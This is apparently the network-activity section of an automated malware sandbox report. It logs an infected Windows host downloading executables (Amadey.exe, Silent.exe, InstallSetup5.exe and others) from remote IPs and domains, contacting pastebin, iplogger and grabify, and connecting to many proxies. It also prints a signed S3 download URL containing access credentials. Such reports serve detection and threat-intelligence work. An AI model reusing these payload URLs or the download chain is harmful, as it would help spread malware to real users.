                  Source: global trafficTCP traffic: 192.168.2.5:50360 -> 146.19.106.42:12334
                  Source: global trafficTCP traffic: 192.168.2.5:50362 -> 138.0.207.18:38328
                  Source: global trafficTCP traffic: 192.168.2.5:50365 -> 114.106.171.192:8089
                  Source: global trafficTCP traffic: 192.168.2.5:50366 -> 72.128.133.154:16099
                  Source: global trafficTCP traffic: 192.168.2.5:50367 -> 103.218.25.245:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50368 -> 51.178.231.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50371 -> 217.196.21.170:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50372 -> 211.54.26.187:3128
                  Source: global trafficTCP traffic: 192.168.2.5:50374 -> 150.230.59.34:8080
                  Source: global trafficTCP traffic: 192.168.2.5:50375 -> 110.77.184.196:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50376 -> 201.163.73.93:55443
                  Source: global trafficTCP traffic: 192.168.2.5:50377 -> 130.255.162.199:12703
                  Source: global trafficTCP traffic: 192.168.2.5:50378 -> 104.236.0.129:22167
                  Source: global trafficTCP traffic: 192.168.2.5:50379 -> 132.148.245.169:38780
                  Source: global trafficTCP traffic: 192.168.2.5:50380 -> 23.152.40.15:5050
                  Source: global trafficTCP traffic: 192.168.2.5:50381 -> 103.156.16.182:1111
                  Source: global trafficTCP traffic: 192.168.2.5:50382 -> 51.178.182.200:63172
                  Source: global trafficTCP traffic: 192.168.2.5:50385 -> 51.158.79.76:16379
                  Source: global trafficTCP traffic: 192.168.2.5:50386 -> 188.164.193.178:11251
                  Source: global trafficTCP traffic: 192.168.2.5:50388 -> 136.243.82.121:1082
                  Source: global trafficTCP traffic: 192.168.2.5:50389 -> 185.186.17.57:5678
                  Source: global trafficTCP traffic: 192.168.2.5:50391 -> 36.89.16.186:8866
                  Source: global trafficTCP traffic: 192.168.2.5:50392 -> 201.238.248.139:9229
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 200 OK
                  Date: Mon, 11 Mar 2024 02:30:54 GMT
                  Server: Apache/2.4.29 (Ubuntu)
                  Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                  ETag: "1ca8e4-6135951a2b6e0"
                  Accept-Ranges: bytes
                  Content-Length: 1878244
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdos-program
                  Source: global traffic
                  HTTP traffic detected: HTTP/1.1 200 OK
                  Date: Mon, 11 Mar 2024 02:30:57 GMT
                  Server: Apache/2.4.29 (Ubuntu)
                  Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                  ETag: "1ca8e4-6135951a2b6e0"
                  Accept-Ranges: bytes
                  Content-Length: 1878244
                  Content-Type: application/x-msdos-program
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Mar 2024 02:31:03 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 11 Mar 2024 02:30:02 GMTETag: "1ca8e4-6135951a2b6e0"Accept-Ranges: bytesContent-Length: 1878244Content-Type: application/x-msdos-program
                  Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1lyxz HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: unknownTCP traffic detected without corresponding DNS query
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,15_2_00404C70
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ukzbu+vH1LRx6rZ&MD=mpFDpHgu HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.inkConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1lyxz HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.su
                  Source: global trafficHTTP traffic detected: GET /raw/E0rY26ni HTTP/1.1Host: pastebin.com
                  Source: global trafficHTTP traffic detected: GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: shipofdestiny.com
                  Source: global trafficHTTP traffic detected: GET /ppg8x HTTP/1.1Host: sty.ink
                  Source: global trafficHTTP traffic detected: GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: namemail.org
                  Source: global trafficHTTP traffic detected: GET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1Host: bitbucket.org
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1Host: ittrade.org
                  Source: global trafficHTTP traffic detected: GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1Host: bbuseruploads.s3.amazonaws.com
                  Source: global trafficHTTP traffic detected: GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1Host: lawyerbuyer.org
                  Source: global trafficHTTP traffic detected: GET /1wxS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: nonesec-fetch-user: ?1upgrade-insecure-requests: 1Host: grabify.org
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /files/Amadey.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /files/Silent.exe HTTP/1.1Host: 15.204.49.148
                  Source: global trafficHTTP traffic detected: GET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1Host: net.geo.opera.com
                  Source: global trafficHTTP traffic detected: GET /InstallSetup5.exe HTTP/1.1Host: 185.172.128.126
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: OS X; U; en) Presto/2.6.30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: internal error: handshake returned an error but is marked successfultls: received unexpected handshake message of type %T when waiting for %T equals www.facebook.com (Facebook)
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: o Debian/1.6-7Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916 equals www.facebook.com (Facebook)
                  Source: unknownDNS traffic detected: queries for: github.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 11 Mar 2024 02:30:37 GMTserver: istio-envoyconnection: closecontent-length: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:38 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Mar 2024 02:30:38 GMTContent-Length: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:39 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: squid/3.5.28
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 952
X-Squid-Error: ERR_ACCESS_DENIED 0
Content-Language: en
X-Cache: MISS from ah_test
Via: 1.1 ah_test (squid/3.5.28)
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: squid
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from cdn-fintech.info
X-Cache-Lookup: NONE from cdn-fintech.info:8123
Connection: keep-alive
Data Ascii: ERR_ACCESS_DENIED
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Length: 19
Data Ascii: 404 page not found
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: Beaver
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 635
Connection: close
Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: squid/4.7
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5
X-Squid-Error: TCP_RESET 0
Vary: Accept-Language
Content-Language: en
X-Cache: MISS from proxy.wakoopa.com
Via: 1.1 proxy.wakoopa.com (squid/4.7)
Connection: keep-alive
Data Ascii: reset
Source: global traffic
HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Server: squid/4.6
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3773
X-Squid-Error: ERR_DNS_FAIL 0
Vary: Accept-Language
Content-Language: en
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Server: squid/3.5.28
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 952
X-Squid-Error: ERR_ACCESS_DENIED 0
Content-Language: en
X-Cache: MISS from ah_test
Via: 1.1 ah_test (squid/3.5.28)
Connection: close
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Server: ADM/2.1.1
Connection: close
Content-Length: 509
<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
Data Raw:
Data Ascii:
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Server: ADM/2.1.1
Connection: close
Content-Length: 509
<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
Data Raw:
Data Ascii:
Source: global traffic
HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
Date: Mon, 11 Mar 2024 02:30:41 GMT
Server: Apache
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 403 Forbidden
